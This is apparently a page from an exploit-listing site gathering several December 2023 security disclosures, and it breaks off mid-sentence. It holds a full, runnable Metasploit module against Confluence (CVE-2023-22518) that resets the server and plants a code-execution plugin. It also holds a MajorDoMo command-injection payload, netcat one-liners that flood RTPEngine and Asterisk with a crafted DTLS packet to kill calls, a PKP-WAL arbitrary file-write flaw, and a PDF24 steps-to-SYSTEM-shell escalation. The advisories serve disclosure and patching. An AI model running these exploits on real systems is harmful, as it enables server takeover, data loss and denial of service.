Latest exploits :: CodePwn

<pre><code>**Introduction** MajorDoMo, a beacon in Russian home automation and particularly favored by Raspberry Pi aficionados, has been a trusted name for over a decade. With over 380 stars on its official GitHub repository at the time of writing (https://github.com/sergejey/majordomo), its popularity is evident. However, lurking within its `thumb.php` module is a severe unauthenticated Remote Code Execution (RCE) vulnerability before 0662e5e. NOTE: this is unrelated to the Majordomo mailing-list manager. **Disclosure Timeline:** - October 28, 2023: Initial discovery of the vulnerability (CVE-2023-50917). - October 29, 2023: Contacted MajorDoMo team detailing the vulnerability. - November 6, 2023: After no response from MajorDoMo's team for over a week, submitted a CVE request to the appropriate CNA. - November 14, 2023: New attempt to contact the MajorDoMo team. Received a response from the team within a few hours. The patch has been applied. - December 15, 2023: Public disclosure of CVE-2023-50917. **Technical Background: The Vulnerable Code** The script `/modules/thumb/thumb.php` is primarily designed for thumbnail generation in MajorDoMo. It serves to facilitate the creation of thumbnails from various media sources. But within this benign purpose lies a significant vulnerability: **Key Code Snippets and Analysis:** 1. **URL Decoding:** PHP code: $url = base64_decode($url); The script takes a base64 encoded `url` parameter and decodes it. This decoding process is pivotal, as it allows attackers to obfuscate their payloads, skirting around simple checks. 2. **Pattern Checks:** PHP code: if (preg_match('/^rtsp:/is', $url) || preg_match('/\/dev/', $url)) { ... } The script then checks if the decoded `url` adheres to specific patterns (`rtsp:` or `/dev`). This is a rudimentary check to decide whether to process the URL. With the help of base64 encoding, it becomes trivial for attackers to bypass this verification. 3. **Direct Command Construction:** PHP code: if ($_GET['transport']) { $stream_options = '-rtsp_transport ' . $_GET['transport'] . ' ' . $stream_options; } Here lies the crux of the vulnerability. The `transport` parameter is taken directly and embedded within a system command without adequate sanitization. This glaring oversight allows for arbitrary command injections. By crafting the `transport` parameter, an attacker can introduce and execute arbitrary commands. The subsequent command is executed via the `exec` function, which poses a significant security risk. **The Core Vulnerability** The vulnerability's essence is the unchecked and unsanitized user input (from the `transport` parameter) that gets directly incorporated into a system command. This allows attackers to run arbitrary commands on the server, potentially taking full control of the MajorDoMo instance. **Exploitation Avenues:** 1. **Bypassing URL Validation:** The script's initial validation checks for patterns such as `rtsp:` or `/dev`. By using base64 encoded strings like `cnRzcDovL2EK` (decoding to `rtsp://a`), these checks can be easily bypassed. 2. **Command Injection via the `transport` Parameter:** The `transport` parameter is used directly within a system command. With no sanitization in place, this can be exploited for command injections, leading to RCE. For instance, the command `||echo; echo $(command_here)` can be used to break out of the intended command and execute any arbitrary command. **Potential Impact** The severity of this RCE vulnerability is high. Given MajorDoMo's integral role in home automation, successful exploitation can result in an attacker compromising physical security systems, gaining access to surveillance cameras, or even taking control of other connected IoT devices. **Recommendations for Mitigation** - Thorough Input Validation: It is essential to rigorously validate all inputs. This can prevent malicious payloads from being processed. - Sanitize Before Execution: Inputs should be sanitized before being incorporated into any system commands. - Limit Direct Command Execution: Prefer using built-in PHP functions or secure APIs over direct system command execution. **Conclusion** This vulnerability underscores the importance of thorough code reviews and robust input validation. Even established software projects like MajorDoMo are not immune to critical vulnerabilities. The discovery serves as a reminder of the ever-present need for diligence and a proactive approach to security in all software development stages. Please refer to https://nvd.nist.gov/vuln/detail/CVE-2023-50917 Valentin Lobstein </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::PayloadPlugin prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)', 'Description' => %q{ This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator. This module uses the administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code execution on the target in the context of the of the user running the confluence server. }, 'Author' => [ 'Atlassian', # Discovery 'jheysel-r7' # msf module ], 'References' => [ [ 'URL', 'https://jira.atlassian.com/browse/CONFSERVER-93142'], [ 'CVE', '2023-22518'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 'Targets' => [ [ 'Java', { 'Platform' => 'java', 'Arch' => [ARCH_JAVA] }, ] ], 'DisclosureDate' => '2023-10-31', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], 'SideEffects' => [ CONFIG_CHANGES, ], # Major config changes - this module overwrites the confluence server with an empty backup with known admin credentials 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options( [ Opt::RPORT(8090), OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), # The endpoint we target to trigger the vulnerability. OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]), # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait. OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30]) ] ) end def check confluence_version = get_confluence_version return Exploit::CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version # Confluence Server and Confluence Data Center have the same vulnerable version ranges. if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) || confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) || confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) || confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) || confluence_version == Rex::Version.new('8.6.0') return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end Exploit::CheckCode::Safe("Confluence version: #{confluence_version}") end # https://passlib.readthedocs.io/en/stable/lib/passlib.hash.atlassian_pbkdf2_sha1.html def generate_hash(password) salt = OpenSSL::Random.random_bytes(16) iterations = 10000 digest = OpenSSL::Digest.new('SHA1') key = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32, digest) salted_key = salt + key encoded_hash = Base64.strict_encode64(salted_key) '{PKCS5S2}' + encoded_hash end def create_zip zip_file = Rex::Zip::Archive.new # exportDescriptor.properties needs to be present in the zip file in order for it to be valid. export_descriptor = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'exportDescriptor.properties')) zip_file.add_file('exportDescriptor.properties', export_descriptor) entities_xml = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'entities.xml')) entities_xml.gsub!('NEW_USERNAME_LOWER', datastore['NEW_USERNAME'].downcase) entities_xml.gsub!('NEW_USERNAME', datastore['NEW_USERNAME']) entities_xml.gsub!('NEW_PASSWORD_HASH', generate_hash(datastore['NEW_PASSWORD'])) zip_file.add_file('entities.xml', entities_xml) zip_file.pack end def upload_backup zip_file = create_zip post_data = Rex::MIME::Message.new post_data.add_part('false', nil, nil, 'form-data; name="buildIndex"') post_data.add_part('Upload and import', nil, nil, 'form-data; name="edit"') post_data.add_part(zip_file, 'application/zip', 'binary', "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(8..16)}\"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'keep_cookies' => true, 'headers' => { 'X-Atlassian-Token' => 'no-check' }, 'vars_get' => { 'synchronous' => 'true' } }, 120) fail_with(Failure::UnexpectedReply, "The endpoint #{datastore['CONFLUENCE_TARGET_ENDPOINT']} did not respond with a 302 or a 200") unless res&.code == 302 || res&.code == 200 print_good("Exploit Success! Login Using '#{datastore['NEW_USERNAME']} :: #{datastore['NEW_PASSWORD']}'") end def exploit print_status("Setting credentials: #{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}") # Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password upload_backup # Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system. payload_endpoint = rand_text_alphanumeric(8) plugin_key = rand_text_alpha(8) begin payload_plugin = generate_payload_plugin(plugin_key, payload_endpoint) upload_payload_plugin(payload_plugin, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD']) trigger_payload_plugin(payload_endpoint) ensure delete_payload_plugin(plugin_key, payload_endpoint, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD']) end end end </code></pre>

<pre><code># RTPEngine susceptible to Denial of Service via DTLS Hello packets during call initiation - Fixed versions: mr12.1.1.2, mr12.0.1.3, mr11.5.1.16, mr10.5.6.3, mr10.5.6.2 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-03-rtpengine-dtls-hello-race - Vendor Patch: https://github.com/sipwise/rtpengine/commit/e969a79428ac4a15cdf1c0a1c6f266dbdc7e60b6 - Tested vulnerable versions: mr11.5.1.6 - Timeline: - Report date: 2023-10-02 - Triaged: 2023-10-02 - Fix provided for testing: 2023-11-16 - Enable Security verified fix: 2023-12-14 - Vendor release with fix: 2023-12-14 - Enable Security advisory: 2023-12-15 ## TL;DR When handling DTLS-SRTP for media setup, RTPEngine is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS encrypted calls during the attack. ## Description Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the RTPEngine server that is expecting packets from the caller, the media session is torn down. This behavior was tested against RTPEngine version mr11.5.1.6, which was found to be vulnerable to this issue. The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller), Kamailio and an RTPEngine server capable of handling WebRTC calls. Diagram showing a call setup against RTPEngine that uses SIP, STUN and DTLS: https://github.com/EnableSecurity/advisories/raw/master/ES2023-03-rtpengine-dtls-hello-race/resources/valid.png In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to RTPEngine's media port from a different IP and port, RTPEngine gave an internal error and did not process the call any longer. Diagram showing a call setup against RTPEngine that fails due to an attacker controlled DTLS ClientHello: https://github.com/EnableSecurity/advisories/raw/master/ES2023-03-rtpengine-dtls-hello-race/resources/dos.png During a real attack, the attacker would spray a vulnerable RTPEngine server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, RTPEngine terminates the media session resulting in Denial of Service. The following log shows that RTPEngine resets the DTLS connection context: ``` DEBUG: [... port 39910]: [ice] Received ICE/STUN response code 0 for candidate pair TUk2hmDhRdEwbjA1:6249488300:1 from 192.168.1.202:56083 to 192.168.1.202 DEBUG: [... port 39910]: [ice] Setting ICE candidate pair TUk2hmDhRdEwbjA1:6249488300:1 as succeeded DEBUG: [... port 39910]: [ice] Best succeeded ICE pair with all components is TUk2hmDhRdEwbjA1:6249488300:1 DEBUG: [... port 39910]: [ice] ICE not completed yet, but can use pair TUk2hmDhRdEwbjA1:6249488300:1 INFO: [... port 39910]: [ice] ICE negotiated: peer for component 1 is 192.168.1.202:56083 INFO: [... port 39910]: [ice] ICE negotiated: local interface 192.168.1.202 DEBUG: [... port 39910]: [srtp] Processing incoming DTLS packet ERR: [... port 39910]: [crypto] DTLS error: 1 (no shared cipher) ERR: [... port 39910]: [srtp] DTLS error on local port 39910 DEBUG: [... port 39910]: [crypto] Resetting DTLS connection context ``` ## Impact Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable RTPEngine servers for calls that rely on DTLS-SRTP. In practice, this results in all new calls appearing to be on mute. ## How to reproduce the issue 1. Run an RTPEngine instance with the following command: ```bash rtpengine -f \ --interface=<interface> \ --listen-ng="<listen-ng>" \ --pidfile=<pidfile> \ --port-min=35000 \ --port-max=40000 \ --log-stderr \ --log-level=10 ``` 1. Run a Kamailio instance with the following configuration: ```bash debug=2 log_stderror=yes memdbg=5 memlog=5 log_facility=LOG_LOCAL0 loadmodule "pv.so" loadmodule "xlog.so" loadmodule "rtpengine.so" loadmodule "sl.so" loadmodule "tm.so" loadmodule "textops.so" loadmodule "siputils.so" modparam("rtpengine", "rtpengine_sock", "udp:<listen-ng>") alias="<alias>" request_route { xlog("L_INFO","$su\n"); if ($rm == "INVITE") { $avp(caller_source)="$si:$sp"; } if ($avp(caller_source) == "$si:$sp") { if ($rm == "INVITE") { rewritehostport("192.168.1.202:9999"); rtpengine_manage("replace-origin replace-session-connection pad-crypto RTP/SAVPF ICE=force"); t_relay(); } break; } else { xlog("L_INFO","got a request from callee [$rm]\n"); break; } } onreply_route{ if ($avp(caller_source) != "$si:$sp") { if (!is_request()) { xlog("L_INFO","got a reply from callee [$rs $rr]\n"); if has_body("application/sdp") { rtpengine_manage("replace-origin replace-session-connection pad-crypto RTP/SAVPF ICE=force"); } } exit; } } ``` 1. Send an INVITE message to Kamailio with WebRTC SDP: ```default INVITE sip:1000@192.168.1.202 SIP/2.0 Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ Max-Forwards: 70 From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT To: <sip:1000@192.168.1.202> Contact: <sip:1000@192.168.1.202> Call-ID: DzGnBLt0z9SK3MC0 CSeq: 5 INVITE Content-Type: application/sdp Content-Length: 385 v=0 o=- 1695296331 1695296331 IN IP4 192.168.1.202 s=- t=0 0 c=IN IP4 192.168.1.202 m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101 a=setup:active a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3 a=rtpmap:0 PCMU/8000/1 a=rtpmap:8 PCMA/8000/1 a=rtpmap:101 telephone-event/8000 a=rtcp-mux a=rtcprsize a=sendrecv ``` 1. Note RTPEngine's media port and IP values, which will be used as the `<rtpengine-ip>` and `<media-port>` parameters by the Attacker 1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the RTPEngine server ```bash CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H" CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF" CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF" CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA=" echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <rtpengine-ip> <media-port> ``` 1. Observe that RTPEngine reports that the DTLS context has been reset ## Solution and recommendations To address this vulnerability, upgrade RTPEngine to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check. ## About Enable Security [Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. ## Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ## Disclosure policy This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. [^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764 -- Sandro Gauci, CEO at Enable Security GmbH Register of Companies: AG Charlottenburg HRB 173016 B Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany RTCSec Newsletter: https://www.rtcsec.com/subscribe Our blog: https://www.rtcsec.com Other points of contact: https://www.enablesecurity.com/contact/ </code></pre>

<pre><code>--------------------------------------------------------------------------------- PKP-WAL <= 3.4.0-3 (NativeImportExportPlugin) Remote Code Execution Vulnerability --------------------------------------------------------------------------------- [-] Software Links: https://pkp.sfu.ca https://github.com/pkp/pkp-lib [-] Affected Versions: PKP Web Application Library (aka PKP-WAL or pkp-lib) version 3.4.0-3 and prior versions, as used in Open Journal Systems (OJS), Open Monograph Press (OMP), and Open Preprint Systems (OPS) before versions 3.4.0-4 or 3.3.0-16. [-] Vulnerabilities Description: The vulnerability is located in the /plugins/importexport/native/filter/PKPNativeFilterHelper.php script. Specifically, into the "PKPNativeFilterHelper::parsePublicationCover()" method: 100. public function parsePublicationCover($filter, $node, $object) 101. { 102. $deployment = $filter->getDeployment(); 103. 104. $context = $deployment->getContext(); 105. 106. $locale = $node->getAttribute('locale'); 107. if (empty($locale)) { 108. $locale = $context->getPrimaryLocale(); 109. } 110. 111. $coverImagelocale = []; 112. $coverImage = []; 113. 114. for ($n = $node->firstChild; $n !== null; $n = $n->nextSibling) { 115. if ($n instanceof DOMElement) { 116. switch ($n->tagName) { 117. case 'cover_image': 118. $coverImage['uploadName'] = $n->textContent; 119. break; 120. case 'cover_image_alt_text': 121. $coverImage['altText'] = $n->textContent; 122. break; 123. case 'embed': 124. $publicFileManager = new PublicFileManager(); 125. $filePath = $publicFileManager->getContextFilesPath($context->getId()) . '/' . $coverImage['uploadName']; 126. file_put_contents($filePath, base64_decode($n->textContent)); 127. break; User input passed through the cover image tags of the import XML file is not properly sanitized before being used at line 118 to construct a variable, which is later used as the final part of the filepath used in a call to the file_put_contents() PHP function at line 126. This can be exploited to write/overwrite arbitrary files on the web server via Path Traversal sequences, leading to execution of arbitrary PHP code. Successful exploitation of this vulnerability requires an account with permissions to access the "Import/Export" plugin, such as a Journal Editor or Production Editor user. [-] Solution: Upgrade to version 3.4.0-4 or later. [-] Disclosure Timeline: [14/10/2023] - Vendor notified [26/10/2023] - Vendor fixed the issue and opened a public GitHub issue: https://github.com/pkp/pkp-lib/issues/9464 [05/11/2023] - CVE identifier assigned [17/11/2023] - Version 3.4.0-4 released [14/12/2023] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-47271 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2023-14 </code></pre>

<pre><code># Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation - Fixed versions: 18.20.1, 20.5.1, 21.0.1,18.9-cert6 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race - Vendor Security Advisory: https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq - Other references: CVE-2023-49786 - Tested vulnerable versions: 20.1.0 - Timeline: - Report date: 2023-09-27 - Triaged: 2023-09-27 - Fix provided for testing: 2023-11-09 - Vendor release with fix: 2023-12-14 - Enable Security advisory: 2023-12-15 ## TL;DR When handling DTLS-SRTP for media setup, Asterisk is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. ## Description Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the Asterisk server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. This behavior was tested against Asterisk version 20.1.0, which was found to be vulnerable to this issue. The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller) and an Asterisk server capable of handling WebRTC calls. Diagram showing a call setup against Asterisk that uses SIP, STUN and DTLS: https://github.com/EnableSecurity/advisories/blob/master/ES2023-01-asterisk-dtls-hello-race/resources/valid.png In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to Asterisk's media port from a different IP and port, Asterisk responded by sending a DTLS Alert to the Caller. Additionally, Asterisk terminated the SIP call by sending a BYE message to the Caller. Diagram showing a call setup against Asterisk that fails due to an attacker controlled DTLS ClientHello: https://github.com/EnableSecurity/advisories/blob/master/ES2023-01-asterisk-dtls-hello-race/resources/dos.png During a real attack, the attacker would spray a vulnerable Asterisk server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service. ## Impact Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. ## How to reproduce the issue 1. Prepare an Asterisk server with an extension configured to handle WebRTC; this may involve the following `pjsip.conf` and `extensions.conf` configuration updates: `pjsip.conf` ```ini [transport-tls-nat] type = transport protocol = wss bind = 172.17.0.2 [webrtc_client] type=aor max_contacts=5 remove_existing=yes [webrtc_client] type=auth auth_type=userpass username=3456 password=3456 [3456] type=endpoint aors=webrtc_client auth=webrtc_client dtls_auto_generate_cert=yes webrtc=yes context=default disallow=all allow=opus,ulaw ``` `extensions.conf` ```ini [globals] [default] exten = _XXXX,1,Verbose(1, "User ${CALLERID(num)} dialed ${EXTEN}.") same => n,Playback(demo-congrats) same => n,Hangup() ``` 1. Send an INVITE message to the target server with WebRTC SDP: ```default INVITE sip:1000@192.168.1.202 SIP/2.0 Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-4RHtimOzaIkHeUDU Max-Forwards: 70 From: <sip:3456@192.168.1.202>;tag=cnbsc3nNX2ydugl4 To: <sip:1000@192.168.1.202> Contact: <sip:3456@192.168.1.202> Call-ID: VaglTzNRBSuvPPdw CSeq: 5 INVITE Content-Type: application/sdp Content-Length: 563 v=0 o=- 1695296401 1695296401 IN IP4 192.168.1.202 s=- t=0 0 c=IN IP4 192.168.1.202 m=audio 36866 UDP/TLS/RTP/SAVPF 0 8 101 a=setup:active a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3 a=rtpmap:0 PCMU/8000/1 a=rtpmap:8 PCMA/8000/1 a=rtpmap:101 telephone-event/8000 a=ice-ufrag:IOZyOSQkVywevryI a=ice-pwd:UQUtRMZKFERnmZqQdaggFzJBhcWVxabr a=candidate:6249488300 1 udp 2130706431 192.168.1.202 36866 typ host generation 0 a=end-of-candidates a=rtcp-mux a=rtcprsize a=sendrecv ``` 1. Note Asterisk's media port and IP values, which will be used as the `<asterisk-ip>` and `<media-port>` parameters by the Attacker 1. When the call has been established, send a STUN binding request which has the appropriate Username, Message-Integrity and Ice-Controlled properties 1. When the Binding Success Response message is received, send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the Asterisk server ```bash CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H" CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF" CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF" CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA=" echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <asterisk-ip> <media-port> ``` 1. Observe that the Caller receives a DTLS Alert message and a SIP BYE message on its signaling channel Note that the above steps are used to reliably reproduce the vulnerability. In the case of a real attack, the attacker simply has to spray the Asterisk server with DTLS messages. ## Solution and recommendations To address this vulnerability, upgrade Asterisk to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check. ## About Enable Security [Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. ## Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ## Disclosure policy This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. [^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764 -- Sandro Gauci, CEO at Enable Security GmbH Register of Companies: AG Charlottenburg HRB 173016 B Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany RTCSec Newsletter: https://www.rtcsec.com/subscribe Our blog: https://www.rtcsec.com Other points of contact: https://www.enablesecurity.com/contact/ </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231211-0 > ======================================================================= title: Local Privilege Escalation via MSI installer product: PDF24 Creator (geek Software GmbH) vulnerable version: <=11.15.1 fixed version: 11.15.2 CVE number: CVE-2023-49147 impact: High homepage: https://tools.pdf24.org/en/creator/ found: 2023-10-16 by: Lukas Donaubauer (Office Munich) Mario Keck (Office Munich) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "pdf24.org is a project of geek software GmbH, a German company based in Berlin, that was founded in 2006. PDF24 offers free and easy to use PDF solutions for many PDF problems, online and as software for download. Solutions include the well-known PDF24 Creator and PDF24 Online Tools." Source: https://www.pdf24.org/en/about-us Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Local Privilege Escalation via MSI installer (CVE-2023-49147) The configuration of the PDF24 Creator MSI installer file was found to produce a visible cmd.exe window running as the SYSTEM user when using the repair function of msiexec.exe. This allows a local attacker to use a chain of actions, to open a fully functional cmd.exe with the privileges of the SYSTEM user. Note: This attack does not work using a recent version of the Edge Browser or Internet Explorer. A different browser, such as Chrome or Firefox, needs to be used. Also make sure, that Edge or IE have not been set to the default browser. Proof of concept: ----------------- 1) Local Privilege Escalation via MSI installer (CVE-2023-49147) For the exploit to work, the PDF24 Creator has to be installed via the MSI file. Afterwards, any low-privileged user can run the following command to start the repair of PDF24 Creator and trigger the vulnerable actions without a UAC popup: msiexec.exe /fa <PATH TO INSTALLERFILE>\pdf24-creator-11.14.0-x64.msi At the very end of the repair process, the sub-process pdf24-PrinterInstall.exe gets called with SYSTEM privileges and performs a write action on the file "C:\Program Files\PDF24\faxPrnInst.log". This can be used by an attacker by simply setting an oplock on the file as soon as it gets read. To do that, one can use the 'SetOpLock.exe' tool from "https://github.com/googleprojectzero/symboliclink-testing-tools" with the following parameters: SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r If the oplock is set, the cmd window that gets opened when pdf24-PrinterInstall.exe is executed doesn't close. The attacker can then perform the following actions to spawn a SYSTEM shell: - right click on the top bar of the cmd window - click on properties - under options click on the "Legacyconsolemode" link - open the link with a browser other than internet explorer or edge (both don't open as SYSTEM when on Win11) - in the opened browser window press the key combination CTRL+o - type cmd.exe in the top bar and press Enter Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 11.14.0 (pdf24-creator-11.14.0-x64.msi) * 11.15.1 (pdf24-creator-11.15.1-x64.msi) A new version was released during our contact attempts (v11.15.1) which is also affected by the vulnerability. The tests were conducted on an up to date Windows 10 system. Vendor contact timeline: ------------------------ 2023-10-20: Contacting vendor through team@pdf24.org; no response. 2023-11-14: Contacting vendor again through team@pdf24.org and stefan@pdf24.org No response. 2023-11-17: Requesting CVE number 2023-11-23: Received CVE number 2023-11-27: Sending vendor CVE number and setting preliminary deadline for advisory release (11th December) 2023-11-27: Identified that latest version 11.15.1 is also vulnerable. 2023-11-28: Vendor response, seems our emails ended up in spam. Sending advisory unencrypted upon vendor request. 2023-12-04: Asking for a status update. Further questions from vendor. Providing more details, clarification regarding Windows 11, browser usage and recommendation for fix. 2023-12-08: Vendor releases fixed version 11.15.2. 2023-12-11: Coordinated release of advisory. Solution: --------- The vendor provides a patched version 11.15.2 which can be downloaded from the vendor's website: https://tools.pdf24.org/en/creator Also check out the changelog from the vendor for further information: https://creator.pdf24.org/changelog/en.html Workaround: ----------- Use the available EXE installer. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application 